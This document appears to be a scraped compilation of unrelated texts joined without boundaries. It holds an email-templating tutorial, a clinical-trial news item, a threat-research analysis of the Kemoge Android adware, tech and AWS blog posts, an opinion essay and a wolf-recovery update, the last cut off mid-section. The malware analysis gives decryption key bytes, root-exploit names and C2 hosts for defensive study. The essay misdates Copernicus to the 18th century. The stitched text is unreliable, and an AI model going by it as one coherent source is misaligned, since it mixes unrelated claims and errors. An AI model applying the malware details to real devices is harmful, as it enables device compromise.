But don't lose faith my friends, luckily enough we live in a golden era in terms of front-end development, an era plenty of libraries, frameworks and tools in general that make our lives so much easier. The purpose of this article is to share my findings in this quest, in the hope that whoever comes next will find a much easier and efficient way to deal with this burden that is HTML email templating. Let's begin!
Enter Zurb Ink
Ink is a framework that enables you to create responsive HTML emails that will work just fine in most devices and email clients.
This is a big deal. If you are used to working with any popular front-end framework such as Twitter Bootstrap or Zurb Foundation, you will appreciate the wonders of having a proper grid system to help you structure your content in a series of rows and columns. Wouldn't it be nice to have something similar when developing email templates? Well, now you have Ink!
Not only does Ink provide us with a grid system, but it also supports other components such as panels that can be used to highlight content, buttons that will display consistently through most email clients and will enable you to create amazing calls to action. You will also find helpers to toggle visibility, add support for retina images, etc.
In order to start using Ink you just have to import their CSS file into your template's HTML file. Then you can add your personal styles below or extend the ones provided by Ink. Your email's head would look something like this:
After you have included the library you can start making use of it. In the example below we add a row with two columns, a main content column occupying two thirds of the document and a side bar that takes the missing third:
<table class="container">
<tr>
<td>
<table class="row">
<tr>
<td class="wrapper">
<table class="eight columns">
<tr>
<td>
Eight Columns
</td>
<td class="expander"></td>
</tr>
</table>
</td>
<td class="wrapper last">
<table class="four columns">
<tr>
<td>
Four Columns
</td>
<td class="expander"></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
You can explore all the possibilities that Zurb Ink has on offer by visiting their documentation site. Once you have finished creating your amazingly looking email I'll meet you in the next section.
I have a kick-ass template, now what?
So, you have put in practice all your front-end coding skills and you have developed a HTML page that looks just great. If only it would look like that in an email client…
The bad news is that you still have a fair bit of work to do. For an HTML email to look good across different clients, the safest bet is to inline all of the styles. This is not just to embed the CSS in the template between <style> tags, it goes down to the level of the style attribute in the HTML tags. The safest you can go is to apply all the styles to each tag using the style attribute.
That sounds like a lot of work… isn't there any good news? Well, there is, and the good news is that you can automate all of it thanks to the invaluable help of GruntJs.
Grunt is a well known Javascript task runner. For the purpose of this article I will assume you are already familiar with it. If that's not the case, I encourage you to visit their Getting Started tutorial. It is super easy to get it up and running.
We will basically set up a task that consists of three steps:
Strip out the unused CSS code Embed the remaining CSS in the template Inline the styles
Let's set all that up.
Removing the excess of CSS
As with any CSS framework, you will rarely use all the potential of Ink in a single email campaign, so there are a lot of rules that will only add more weight to the email and will never be used.
To fix this we can make use of grunt-uncss. Just like any Grunt extension, we will use node to install it:
npm install grunt-uncss --save-dev
And then add the task to the Gruntfile
grunt.loadNpmTasks('grunt-uncss');
The last bit is to configure the blog that will sit inside the initConfig method that will tell uncss how to operate.
uncss: {
dist: {
src: ['source_file.html'],
dest: 'dist/css/tidy.css',
options: {
report: 'min' // optional: include to report savings
}
}
}
In the src array you will specify the files that you want to track CSS usage for. In the case of an email communication it will normally be just one single file. The task will analyse that file and extract only the CSS rules being applied to it. Those rules will be outputted to the dest file.
Making use of the simplified CSS file
In order to embed the newly created, shrank CSS file, we can leverage of the processhtml grunt extension. With this extension we can replace all the development CSS files with the distribution one by just adding some metadata in the HTML file.
npm install grunt-processhtml --save-dev
After installing the module we'll proceed to create the Gruntfile task,
grunt.loadNpmTasks('grunt-processhtml');
and add the configuration to the initConfig method
processhtml: {
dist: {
files: {
'dist/email.html': ['source_file.html']
}
}
}
Here we are setting the source file to be the same as in the previous task, so what is the difference? We will need to add the build metadata to it so processhtml knows what to do. Let's have a look at the following block of code:
<head>
<!-- build:css css/tidy.css -->
<link rel=”stylesheet” href=”ink.css”>
<link rel=”stylesheet” href=”your_own_styles.css”>
<!-- /build -->
</head>
By using this metadata comments we are telling the task to grab the link declarations between the build block and replace them by a link to the tidy.css file that we created on the first step.
This will generate a distribution html file that references only styles that are being used by it, no extra garbage added. The only missing part is to inline those styles!
Inlining styles, or creating the big HTML mess
Some email clients like Google's GMail will strip out any <style> tags they find, so in general it is a good idea to inline as much as you can, which would be everything except for media queries.
Ink provides an online CSS inliner that works great. The only problem is that as of the time of this writing they don't provide a tool to automate such a process. However they advice to use Premailer, which is the project Ink's inliner is forked from.
Luckily for us, there is a grunt wrapper that we can easily install, but before you will need to install the Premailer gem in case you don't have it in your system already:
gem install premailer
npm install grunt-premailer --save-dev
Next up, we can configure the Gruntfile accordingly:
grunt.loadNpmTasks('grunt-premailer');
and finally,
premailer: {
main: {
options: {
verbose: true
},
files: {
'dist/email-inline.html': ['dist/email.html']
}
}
}
Pretty straightforward, we pass the file we got after running the previous task as input and we will get an inlined file as specified in the output. That is easy!
Finalising…
Obviously we are missing a final bit, which is to configure the grunt task that will run this whole workflow. We can easily do that in the Gruntfile by adding something like
grunt.registerTask('email', ['uncss', 'processhtml', 'premailer']);
With this in place and once we have an HTML file that we want to minimise and inline we would just need to run the command
$ grunt email
And we would be all set for success!
As a final note, these tools work pretty well but they are not perfect. I strongly encourage you to test the results before sending a communication out to end customers.
Improving communications skills and the use of a simple blood test could help cut the growing number of inappropriate prescriptions of antibiotics, a joint Cardiff University trial has discovered.
In a major new clinical trial, published in the British Medical Journal, a team of researchers from Cardiff University's School of Medicine together with researchers from the Maastricht University Medical Centre in the Netherlands found those GPs in primary care who underwent training in advanced communications skills and those who made use of a simple blood test prescribed fewer antibiotics for lower respiratory tract infections, which generally do not respond to antibiotics.
Professor Christopher Butler, Head of Department of Primary Care and Public Health at Cardiff University who led the trial, said: "As the problem of bacteria resistant to antibiotic treatment grows, researchers from around the world are seeking ways to improve the quality of antibiotic prescribing. Prescribing antibiotics only when patients will clearly benefit, reduces the pressure that drives antibiotic resistance.
"Conditions like acute bronchitis account for some 80% of all lower respiratory tract infections and despite evidence of little or no benefit from antibiotics, the majority of these patients are still prescribed antibiotics.
"We know that with the many pressures facing GPs, including worry about leaving pneumonia untreated, they often give patients "the benefit of the doubt" and prescribe antibiotics. Our clinical trial therefore sought to evaluate ways antibiotic prescribing could be reduced without adversely affecting patient recovery or satisfaction with care."
The trial evaluated an 'illness focussed' approach, where clinicians seek to better understand the patient's illness experience and communicate more effectively about management, and a 'disease focussed' approach, where clinicians focus on diagnosis, in this case, a simple point-of-care blood test.
The trial randomised 20 general practices in the Netherlands, where 40 GPs managed 431 patients with lower respiratory tract infection.
Dr Kerry Hood, Director of the South East Wales Trials Unit said, "The results showed that 54% of GPs practising according to usual care prescribed antibiotics, whereas 27% of those who had been trained in the advanced communication and 31% of the GPs who used the blood test methods did so. Only 23% of GPs who were trained in the advanced communication skills and who used the blood test prescribed antibiotics."
Professor Butler added, "This international collaboration between primary care researchers from Cardiff and Maastricht has shown that both an 'illness focussed' and a 'disease focussed' approach were effective in reducing antibiotic prescribing, but the two approaches combined give the greatest benefit. We need to both communicate better and improve diagnosis to do the best for our patients and to preserve antibiotic effectiveness for our children.
"Importantly, the results showed that prescribing fewer antibiotics did not mean that patients were unwell for longer. Patient's recovery and satisfaction with care were not compromised by GPs not prescribing their patient antibiotics."
Source: Cardiff University
Figure 1. World Infection Map
As shown in Figure 1, the infection range is wide with identified victims from more than 20 countries, including governments and large-scale industries. This malicious adware disguises itself as popular apps via repackaging, so it propagates widely. Some examples are shown in Figure 2.
Figure 2. Kemoge samples in the wild
Figure 3. An overview of Kemoge's lifecycle
Figure 3 illustrates the lifecycle of Kemoge. The attacker uploads the apps to third-party app stores and promotes the download links via websites and in-app ads. Some aggressive ad networks gaining root privilege can also automatically install the samples. On the initial launch, Kemoge collects device information and uploads it to the ad server, then it pervasively serves ads from the background. Victims see ad banners periodically regardless of the current activity (ads even pop up when the user stays on the Android home screen).
Figure 4. Code snippet from Kemoge AndroidManifest.xml
Initially Kemoge is just annoying, but it soon turns evil. As shown in Figure 4, it registers MyReceiver in the AndroidManifest to automatically launch when the user unlocks the device screen or the network connectivity changes. MyReceiver then invokes MyService; both are disguised as Google's code (prefixed with com.google.rp.confirm). Some other samples also use com.google.system.provider.confirm, com.google.ad.sprovider, com.android.ad.sprovider, etc. as the component prefix.
After launching, MyService looks for an asset called <name>.mp4, where <name> can be bg, info or hello. The mp4 extension conceals that the asset is actually a ZIP file with multiple levels of encryption. First of all, it uses ZIP inherent password-based encryption to protect the content. The protected ZIP file is then encrypted with DES. Finally, it encrypts the DES key (denoted as Key1) with another DES key (denoted as Key2) and disassembles Key2 as bytes in the code. At runtime Kemoge decrypts the ZIP file in the reversed order, as shown in Figure 5.
Figure 5. The decryption process of the ZIP file
Figure 6. Decompiled Java code snippet of DES key generation
For example, Figure 6 shows Kemoge's decompiled Java code snippet to obtain Key2 and then generate Key1. The code snippet initializes DESKeySpec with bytes [0x73, 0x41, 0x26, 0x73, 0x32, 0x76, 0x24, 0x31] as Key2 to decrypt bytes [0x87, 0xAF, 0xF9, 0xE5, 0x93, 0xE1, 0x50, 0x5A, 0x12, 0x8B, 0x9F, 0x8C, 0x72, 0x86, 0x79, 0xE3]. Note that the code obfuscates the encrypted bytes by replacing actual bytes with the bytes of the actual bytes' ASCII characters, for example 0x87 is replaced by 0x38 and 0x37 (“8” and “7”). The decryption uses Android Bouncy Castle's default DES mode (DES/ECB/PKCS5Padding) without specifying the initial vector. The decrypted bytes are [0x35, 0x64, 0x26, 0x4c, 0x32, 0x2c, 0x54, 0x39, 0x77, 0x4f], which are used to derive Key1 (with DESKeySpec) to decrypt the encrypted ZIP file. Again the decryption algorithm is the default DES mode without initial vector.
Following the same process obtaining Key1 but with different encrypted bytes as input, Kemoge generates the ZIP protecting password. After unzipping the file, it extracts the following files:
AndroidRTService.apk
root.sh
busybox
su
.root
root_001, root_002, ..., root_008 (eight root exploit executables)
This malware carries as many as eight root exploits to root phones, targeting a wide range of device models. The root methods include mempodroid, motochopper, perf_swevent exploit, sock_diag exploit, and put_user exploit. Some of the exploits seem to be compiled from open source projects (e.g. [2][3]), but some come from the commercial tool “Root Dashi” (or “Root Master”), mentioned in our previous blog.
After gaining root, it executes root.sh to obtain persistency. Afterwards, it implants the AndroidRTService.apk into /system partition as Launcher0928.apk -- the filename imitates the legit launcher system service. Moreover, the package name of this apk also looks like authentic services, e.g., com.facebook.qdservice.rp.provider and com.android.provider.setting.
This malicious system service contacts aps.kemoge.net for commands. To evade detection, it does not constantly communicate to the server. Instead, it only asks for commands on the first launch or after 24 hours from its last command. In each communication, it first posts the IMEI, IMSI, storage info, and installed app info to the remote server. We intercepted the network traffic on a Nexus 7 with Android 4.3 and with the first sample listed in Appendix I installed. The corresponding traffic is shown in Figure 7. After uploading the device info, it asks commands from the server, as shown in Figure 8.
Figure 7. Kemoge uploads device information
Figure 8. Kemoge uploads further information and asks for commands
The server responds with a command out of three groups and the malicious system service executes it:
Uninstall designated apps
Launch designated apps
Download and install apps from URLs given by server
Figure 9. Server responses for remote control
As of this writing the CnC channel is still running. During our experiment, we received the response shown in Figure 9. In this case, it is trying to uninstall AV apps and popular legit apps, possibly preparing for further attacks.
Appendix I lists a few examples of Kemoge. Appendix II lists some of the used signing certificates. We observed that all samples contain simplified Chinese characters in the code. Interestingly, one sample is also published on Google Play, with root exploits and CnC behaviors stripped.
Figure 10. Google Play screenshot for “ShareIt” [4]
The Kemoge sample with package name cc.taosha.toolbox.shareit and MD5 40b1dcbe5eca2d4cf3621059656aabb5 is signed using the first certificate listed in Appendix II. The same certificate signed a Google Play app with the same app/package name (shown in Figure 10) so it's from the same developer. This Google Play app has 100K~500K downloads. Based on the developer's name (“Zhang Long”) and the third-party libraries integrated in the app (cn.wap3, com.renren, com.tencent, etc.), it is possible the developer is from China.
Based on the user comments, ShareIt has the same characteristics as Kemoge (annoyingly serving ads, automatically propagating via other aggressive channels, etc.). Possibly to satisfy the vetting process, the Google Play version removes the root exploits and CnC behaviors, but it does contact adm.kemoge.net and ads.kemoge.net for advertisements. Also, it asks taosha.cc for updates and prompts for upgrade installation if the remote server sends back an apk file. In our experiment the server was running but only returned a 404 code, so the developer could serve the malicious version or other malware. We have notified Google about this threat and users should be cautious downloading this app.
Conclusion
This is another malicious adware family, possibly written by Chinese developers or controlled by Chinese hackers, spreading on a global scale that represents a significant threat. We suggest that you:
Never click on suspicious links from emails/SMS/websites/advertisements.
Don't install apps outside the official app store.
Keep Android devices updated to avoid being rooted by public known bugs. (Upgrading to the latest version of OS will provide some security, but it does not guarantee that you will remain protected.)
To detect and defend against such attacks, we advise our customers to deploy a mobile security solution such as FireEye MTP to gain visibility into threats in their user base, and proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that WiFi traffic is scanned by NX appliances to extend coverage to mobile devices.
References
[1] https://www.fireeye.com/blog/threat-research/2015/09/guaranteed_clicksm.html
[2] https://github.com/trevd/android_root
[3] https://github.com/saurik/mempodroid
Appendix I. Examples of Kemoge
Package Name App Name MD5 cc.taosha.beautify.easylocker Easy Locker 2701de69ea6b57bbc827830660711ea2 cc.taosha.toolbox.shareit ShareIt 40b1dcbe5eca2d4cf3621059656aabb5 com.cg.sexposition Sex Cademy abaf6cb1972d55702b559725983e134a com.cg.wifienhancer WiFi Enhancer 0c67d0919e574a6876c73118260368ee com.change.unlock.zhiwenjiesuo Fingerprint unlock 1be29a6622543f6f5063eda1d83a4e49 com.funme.assistivetouch Assistive Touch 7cd86d83d916dbd9b04d0e7e4f9ff6e8 com.funme.sexfree Calculator bf6dc2f78baed212f6aa4268da086e09 com.jrhw.pinkygirls PinkyGirls 6fc29ab75d87a5b1e0dd792c5c68d738 com.kayaya.tao.tomcat Talking Tom 3 b36a751d72e2bdea80e7ff72b6fb3a41 com.kiss.browser Kiss Browser cec85188308644273332d00d633ab875 com.leo.appmaster Privacy Lock f1a16304e427b7f8657de8c3dfb1d33f com.light.browser Light Browser 162cb09e2eebd595eae2617cd3af1d0d com.magic.gmobiepay.clear Magic Treasure aa31e77775f5ce3e85ebf3bdb09f590e com.space.funhgames.september 2048kg efb917cb0cf09fc38b98500af61d30dc com.star.android.smartTouch Smart Touch db563053762250a5cb4d0c10e0e3dbb0
Appendix II. Example Signing Certificates
Owner: CN=tao sha, OU=IT, O=taosha.cc, L=Shenzhen, ST=Guangdong, C=86
SHA1: EF:A5:C2:18:9C:21:4B:A8:21:90:4C:10:6A:B5:77:53:0F:22:00:62
Owner: CN=hexy_root_009, OU=hexy_root_009, O=hexy_root_009, L=hexy_root_009, ST=hexy_root_009, C=hexy_root_009
SHA1: E3:BD:4B:4F:38:7C:1A:A8:C0:4C:98:B2:B2:B1:B0:CF:33:5E:71:BC
Owner: CN=keke_root_025, OU=keke_root_025, O=keke_root_025, L=keke_root_025, ST=keke_root_025, C=keke_root_025
SHA1: 41:F4:9B:14:E9:8A:7C:EF:5E:BF:D9:9C:8F:58:43:48:45:BE:12:B2
Owner: CN=kiss, OU=kiss, O=kiss, L=hangzhou, ST=zhejiang, C=86
SHA1: 72:62:C5:38:78:81:B1:10:51:B3:D3:B3:63:B5:AC:F9:B9:8F:6E:B9
Owner: CN=google, OU=google, O=android, C=CN
SHA1: E9:20:9A:53:9B:C7:41:22:1D:53:37:FE:FA:9E:26:59:6C:3D:08:96
Owner: CN=wilson, OU=land, O=land, L=hangzhou, ST=zhejiang, C=86
SHA1: E5:58:C9:BA:6A:A3:D1:AC:2A:12:5B:94:C6:F6:02:2F:EE:0D:19:39
Owner: CN=hzckgames, OU=hzckgames, O=hzckgames, L=hangzhou, ST=zhejiang, C=86
SHA1: 49:D2:51:A6:67:CC:9D:C2:9D:AB:FA:E8:D3:85:44:FF:B0:59:BC:90
Owner: CN=hong, OU=fjwy, O=fjwy, L=zhejiang, ST=zhejiang, C=CN
SHA1: 89:81:E2:B0:30:A9:A4:60:5D:B2:4B:E4:31:59:A3:01:73:1C:C6:53
The Volvo XC90 is perhaps the best SUV on the market today. The Microsoft Band 2 is a capable but somewhat niche smartband. Combine them and you can use voice control your Volvo from your wrist. Yes, it's not unlike Knight Rider.
The Microsoft Band app hooks into Volvo's On Call mobile app to remotely control the locks, start the car, activate the heater, or set the navigation. It isn't the first time Volvo has embraced the wrist — earlier this year, Volvo released Apple Watch and Android Wear apps that perform similar functions, albeit without the voice control abilities.
This isn't the first time Volvo and Microsoft have collaborated. Last year, the two companies partnered on a virtual showroom using the HoloLens augmented reality headset that creates a novel replacement for the traditional car shopping experience. But, unlike the HoloLens concept, this is something that consumers will actually be able to use in a few months. The Band 2 Volvo app will be out this spring.
Today, AWS introduced AWS Directory Service for Microsoft Active Directory (Standard Edition), also known as AWS Microsoft AD (Standard Edition), which is managed Microsoft Active Directory (AD) that is performance optimized for small and midsize businesses. AWS Microsoft AD (Standard Edition) offers you a highly available and cost-effective primary directory in the AWS Cloud that you can use to manage users, groups, and computers. It enables you to join Amazon EC2 instances to your domain easily and supports many AWS and third-party applications and services. It also can support most of the common use cases of small and midsize businesses. When you use AWS Microsoft AD (Standard Edition) as your primary directory, you can manage access and provide single sign-on (SSO) to cloud applications such as Microsoft Office 365. If you have an existing Microsoft AD directory, you can also use AWS Microsoft AD (Standard Edition) as a resource forest that contains primarily computers and groups, allowing you to migrate your AD-aware applications to the AWS Cloud while using existing on-premises AD credentials.
In this blog post, I help you get started by answering three main questions about AWS Microsoft AD (Standard Edition):
What do I get? How can I use it? What are the key features?
After answering these questions, I show how you can get started with creating and using your own AWS Microsoft AD (Standard Edition) directory.
1. What do I get?
When you create an AWS Microsoft AD (Standard Edition) directory, AWS deploys two Microsoft AD domain controllers powered by Microsoft Windows Server 2012 R2 in your Amazon Virtual Private Cloud (VPC). To help deliver high availability, the domain controllers run in different Availability Zones in the AWS Region of your choice.
As a managed service, AWS Microsoft AD (Standard Edition) configures directory replication, automates daily snapshots, and handles all patching and software updates. In addition, AWS Microsoft AD (Standard Edition) monitors and automatically recovers domain controllers in the event of a failure.
AWS Microsoft AD (Standard Edition) has been optimized as a primary directory for small and midsize businesses with the capacity to support approximately 5,000 employees. With 1 GB of directory object storage, AWS Microsoft AD (Standard Edition) has the capacity to store 30,000 or more total directory objects (users, groups, and computers). AWS Microsoft AD (Standard Edition) also gives you the option to add domain controllers to meet the specific performance demands of your applications. You also can use AWS Microsoft AD (Standard Edition) as a resource forest with a trust relationship to your on-premises directory.
2. How can I use it?
With AWS Microsoft AD (Standard Edition), you can share a single directory for multiple use cases. For example, you can share a directory to authenticate and authorize access for .NET applications, Amazon RDS for SQL Server with Windows Authentication enabled, and Amazon Chime for messaging and video conferencing.
The following diagram shows some of the use cases for your AWS Microsoft AD (Standard Edition) directory, including the ability to grant your users access to external cloud applications and allow your on-premises AD users to manage and have access to resources in the AWS Cloud. Click the diagram to see a larger version.
Use case 1: Sign in to AWS applications and services with AD credentials
You can enable multiple AWS applications and services such as the AWS Management Console, Amazon WorkSpaces, and Amazon RDS for SQL Server to use your AWS Microsoft AD (Standard Edition) directory. When you enable an AWS application or service in your directory, your users can access the application or service with their AD credentials.
For example, you can enable your users to sign in to the AWS Management Console with their AD credentials. To do this, you enable the AWS Management Console as an application in your directory, and then assign your AD users and groups to IAM roles. When your users sign in to the AWS Management Console, they assume an IAM role to manage AWS resources. This makes it easy for you to grant your users access to the AWS Management Console without needing to configure and manage a separate SAML infrastructure.
Use case 2: Manage Amazon EC2 instances
Using familiar AD administration tools, you can apply AD Group Policy objects (GPOs) to centrally manage your Amazon EC2 for Windows or Linux instances by joining your instances to your AWS Microsoft AD (Standard Edition) domain.
In addition, your users can sign in to your instances with their AD credentials. This eliminates the need to use individual instance credentials or distribute private key (PEM) files. This makes it easier for you to instantly grant or revoke access to users by using AD user administration tools you already use.
Use case 3: Provide directory services to your AD-aware workloads
AWS Microsoft AD (Standard Edition) is an actual Microsoft AD that enables you to run traditional AD-aware workloads such as Remote Desktop Licensing Manager, Microsoft SharePoint, and Microsoft SQL Server Always On in the AWS Cloud. AWS Microsoft AD (Standard Edition) also helps you to simplify and improve the security of AD-integrated .NET applications by using group Managed Service Accounts (gMSAs) and Kerberos constrained delegation (KCD).
Use case 4: SSO to Office 365 and other cloud applications
You can use AWS Microsoft AD (Standard Edition) to provide SSO for cloud applications. You can use Azure AD Connect to synchronize your users into Azure AD, and then use Active Directory Federation Services (AD FS) so that your users can access Microsoft Office 365 and other SAML 2.0 cloud applications by using their AD credentials.
Use case 5: Extend your on-premises AD to the AWS Cloud
If you already have an AD infrastructure and want to use it when migrating AD-aware workloads to the AWS Cloud, AWS Microsoft AD (Standard Edition) can help. You can use AD trusts to connect AWS Microsoft AD (Standard Edition) to your existing AD. This means your users can access AD-aware and AWS applications with their on-premises AD credentials, without needing you to synchronize users, groups, or passwords.
For example, your users can sign in to the AWS Management Console and Amazon WorkSpaces by using their existing AD user names and passwords. Also, when you use AD-aware applications such as SharePoint with AWS Microsoft AD (Standard Edition), your logged-in Windows users can access these applications without needing to enter credentials again.
3. What are the key features?
AWS Microsoft AD (Standard Edition) includes the features detailed in this section.
Extend your AD schema
With AWS Microsoft AD, you can run customized AD-integrated applications that require changes to your directory schema, which defines the structures of your directory. The schema is composed of object classes such as user objects, which contain attributes such as user names. AWS Microsoft AD lets you extend the schema by adding new AD attributes or object classes that are not present in the core AD attributes and classes.
For example, if you have a human resources application that uses employee badge color to assign specific benefits, you can extend the schema to include a badge color attribute in the user object class of your directory. To learn more, see How to Move More Custom Applications to the AWS Cloud with AWS Directory Service.
Create user-specific password policies
With user-specific password policies, you can apply specific restrictions and account lockout policies to different types of users in your AWS Microsoft AD (Standard Edition) domain. For example, you can enforce strong passwords and frequent password change policies for administrators, and use less-restrictive policies with moderate account lockout policies for general users.
Add domain controllers
You can increase the performance and redundancy of your directory by adding domain controllers. This can help improve application performance by enabling directory clients to load-balance their requests across a larger number of domain controllers.
Encrypt directory traffic
You can use AWS Microsoft AD (Standard Edition) to encrypt Lightweight Directory Access Protocol (LDAP) communication between your applications and your directory. By enabling LDAP over Secure Sockets Layer (SSL)/Transport Layer Security (TLS), also called LDAPS, you encrypt your LDAP communications end to end. This helps you to protect sensitive information you keep in your directory when it is accessed over untrusted networks.
Improve the security of signing in to AWS services by using multi-factor authentication (MFA)
You can improve the security of signing in to AWS services, such as Amazon WorkSpaces and Amazon QuickSight, by enabling MFA in your AWS Microsoft AD (Standard Edition) directory. With MFA, your users must enter a one-time passcode (OTP) in addition to their AD user names and passwords to access AWS applications and services you enable in AWS Microsoft AD (Standard Edition).
Get started
To get started, use the Directory Service console to create your first directory with just a few clicks. If you have not used Directory Service before, you may be eligible for a 30-day limited free trial.
Summary
In this blog post, I explained what AWS Microsoft AD (Standard Edition) is and how you can use it. With a single directory, you can address many use cases for your business, making it easier to migrate and run your AD-aware workloads in the AWS Cloud, provide access to AWS applications and services, and connect to other cloud applications. To learn more about AWS Microsoft AD, see the Directory Service home page.
If you have comments about this post, submit them in the “Comments” section below. If you have questions about this blog post, start a new thread on the Directory Service forum.
– Peter
Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.
I want you to imagine that these words are etched onto the screen not with pixels, but with my very own blood. No, truly visualize it. Imagine the little red droplets leaking down from every consonant.
You see, I suffer from a syndrome that inflicts its torture upon almost half of American women in my age bracket (25-29). This unspeakable syndrome is known as “Meaningless Life Syndrome.” Its most common cause: not using our uteruses to produce offspring. How irresponsible of us!
We victims of Meaningless Life Syndrome wake up every morning knowing that every noble deed we do, every friendship we form, and every elderly person we assist across the street are entirely meaningless. Sometimes, we wonder why we bother at all.
Why on earth would we go through the hassle of advocating for better treatment of animals when we could be enduring the miraculous physical trauma of childbirth? Why on earth would we dedicate countless hours studying the complexities of nutrition to improve the health of the global population when we could be cleaning mashed peas out of our hair? What in the world would entice us to invest energy into our romantic, personal, and professional relationships when we could be taking the iPhone away from our hormonal teenager for staying out past their curfew and calling us a stupid bitch?
In case the above paragraph did not make it clear, I am not suffering. And chances are, many of the other 49 percent who live sans children are not suffering either. A large portion of us chose this life. We are either waiting, or we have decided to forego it altogether.
And of course, parents can be activists and loyal friends even while they raise a child, and hats off to them. However, when you say your life was meaningless before having your child, you are implying that those of us without children are living meaningless lives. This is problematic and untrue for three reasons:
You are directly stating your life was meaningless before this child came along and took over my Facebook News Feed. If this were true, why did you get out of bed all those years? Why did you waste your time making meaningless memories with your significant other? Why did you go to school? Why did you make friends? Why did you attend that march for gay rights, or whatever causes you supported? Why did you go on that vacation and take a million pictures of those meaningless moments? Those few decades must have been exceedingly tough for you. Thankfully, your life has meaning now. Phew! Some people want children and can't have them. You just rubbed your pompous Pink Himalayan Salt in their wounds. Congrats. Some people genuinely don't want children. You are implying the other goals we pursue instead are meaningless. Susan B. Anthony never had children, but they tenaciously dedicated their life to securing women's right to vote. Beethoven never had children, but they mastered an art and enriched the lives of generations to come with their symphonies and concertos. Coco Chanel lived a childfree life, but they used their precious creativity to revolutionize the fashion industry by introducing liberating and iconic styles for women—who were previously shackled in confining corsets—and is considered one of Time's 100 most influential people of the 20th Century. Nicolaus Copernicus also did not have children, probably because they were too busy contributing to the Scientific Revolution of the 18th Century and convincing people that the sun—not the earth—was the center of the universe. But their lives were meaningless, right?
Those of us who make a conscious choice to be childfree endure many insensitive comments, such as (but definitely not limited to), “You'll change your mind,” or “But that's your life purpose!” However, stating that your life had no meaning before children has to be the most insulting.
Certainly, having a child added meaning to your life. It indeed altered the meaning of your life. But—unless you formerly lived with zero hobbies, passions, and life goals—it is highly unlikely that your life was previously void of meaning, just as my life is not meaningless and will continue to not be meaningless as I age, sans children.
It may just be a clichéd expression at this point, but on behalf of all non-parents—whether by choice or not—I urge you to consider the implications of this statement. You are (at best) insulting my existence on earth, or (at worst) smacking someone across the face with the painful reminder that they are unable to reproduce. There is no winner here.
The following is a summary of Mexican Wolf Reintroduction Project (Project) activities in the Mexican Wolf Experimental Population Area (MWEPA) in Arizona, including the Fort Apache Indian Reservation (FAIR), San Carlos Apache Reservation (SCAR), and New Mexico. Additional Project information can be obtained by calling (928) 339-4329 or toll free at (888) 459-9653, or by visiting the Arizona Game and Fish Department website at
www.azgfd.gov/wolf or by visiting the U.S. Fish and Wildlife Service website at www.fws.gov/southwest/es/mexicanwolf.
Overall Mexican Wolf Recovery Program Monthly UpdateGenetic results from a male pup, mp1561, in the Leopold Pack indicate that the breeding female of the Leopold Pack is AF1346; a pup cross-fostered into the Dark Canyon Pack in 2014. This confirms the first instance of a Mexican wolf cross-fostered into a wild den surviving to and successfully reproducing offspring. This is a significant accomplishment in recovery efforts to increase genetic diversity in the wild population through cross-fostering efforts. M1347 of the Baldy Pack was also cross-fostered into the Dark Canyon pack in 2014. M1347 has survived to reproductive age and has paired with f1445 which was named the Baldy Pack by the IFT in September 2016.
On December 1, 2016, the Mexican Wolf/Livestock Council met to discuss requests for depredation compensation that varied from the depredation compensation guidelines. The Council also discussed how they would use estate funds that were provided to the National Fish and Wildlife Foundation for conservation of the Mexican wolf.
On December 6, 2016, the Fish and Wildlife Service gave a recovery award to Chairman Lupe of the White Mountain Apache Tribe for their exceptional contributions to the Mexican Wolf Recovery Program. The Mexican wolf population on the 1.6 million-acre Fort Apache Indian Reservation has grown and now contributes substantially to the overall recovery of the Mexican wolf. Over fifteen years ago, the White Mountain Apache Tribe became the first tribe to officially facilitate Mexican wolf recovery.
NUMBERING SYSTEM:
Mexican wolves are given an identification number recorded in an official studbook that tracks their history. Capital letters (M = Male, F = Female) preceding the number indicate adult animals 24 months or older. Lower case letters (m = male, f = female) indicate wolves younger than 24 months or pups. The capital letter “A” preceding the letter and number indicate breeding wolves.
DEFINITIONS:
A “wolf pack” is defined as two or more wolves that maintain an established territory. In the event that one of the two alpha (dominant) wolves dies, the remaining alpha wolf, regardless of pack size, retains the pack status. The packs referenced in this update contain at least one wolf with a radio telemetry collar attached to it. The Interagency Field Team (IFT) recognizes that wolves without radio telemetry collars may also form packs. If the IFT confirms that wolves are associating with each other and are resident within the same home range, they will be referenced as a pack.
CURRENT POPULATION STATUS
Population monitoring requires year round effort documenting births, deaths, survival, total numbers, and distribution. Mortality occurs throughout the year and is particularly high on young pups, so while the IFT has documented reproduction this year, the IFT will not have a complete idea of how many of these young pups and adults have died until the annual population survey which is conducted in the winter. Annual surveys are conducted in the winter because it is when the population is experiencing the least amount of natural fluctuation (i.e. in the spring the population increases dramatically with the birth of new pups and declines throughout the summer and fall as mortality is particularly high on young pups). Thus, the IFT summarizes the total number of wolves in the winter at a fairly static or consistent time of year. This allows for comparable year-to-year trends at a time of year that accounts for most mortality and survival of young pups. At this time, the IFT's best population estimate is that there was a minimum of 97 wolves in the wild as of December 31, 2015. End of year counts for 2016 are currently ongoing and will be completed in February 2017. At the end of December, there were 56 wolves with functioning radio collars that the IFT was actively monitoring.
IN ARIZONA:
Bear Wallow Pack (collared AM1338 and AF1335)In December, the Bear Wallow Pack was located within their traditional territory in the east central portion of the Apache-Sitgreaves National Forest (ASNF).
Bluestem Pack (collared M1382, F1488, F1443, fp1562, and fp1563)In December, the Bluestem Pack continued to use their traditional territory in the east central portion of the ASNF. M1382 and F1488 from the Bluestem Pack displayed dispersal behavior during the month. F1443 continued to travel with m1447, of the Diamond Pack, in New Mexico near the Arizona border.
Elk Horn Pack (collared AF1294, AM1342, mp1474, and mp1471) In December, the Elk Horn Pack was located within their traditional territory in the north eastern portion of the ASNF.
Hawks Nest Pack (collared AM1038) In December, the Hawks Nest Pack was mostly located within their traditional territory in the north central portion of the ASNF. The IFT documented movements by AM1038 outside of the normal pack territory. Two additional sets of wolf tracks with AM1038 and photos from a remote camera indicate male sub-adults M1383 and m1483 from the Hawks Nest Pack may still be traveling with AM1038.
Hoodoo Pack (collared AM1290, AF1333, m1441, fp1549, and fp1550)In December, the Hoodoo Pack remained in the north central portion of the ASNF.
Maverick Pack (collared AF1291)In December, the Maverick Pack was located within their traditional territory both on the FAIR and ASNF. AM1183 was documented traveling with AF1291.
Panther Creek Pack (collared AF1339, AM1394, mp1483, fp1484, and mp1486)In December, the Panther Creek Pack was located in the east central portion of the ASNF.
ON THE FAIR:
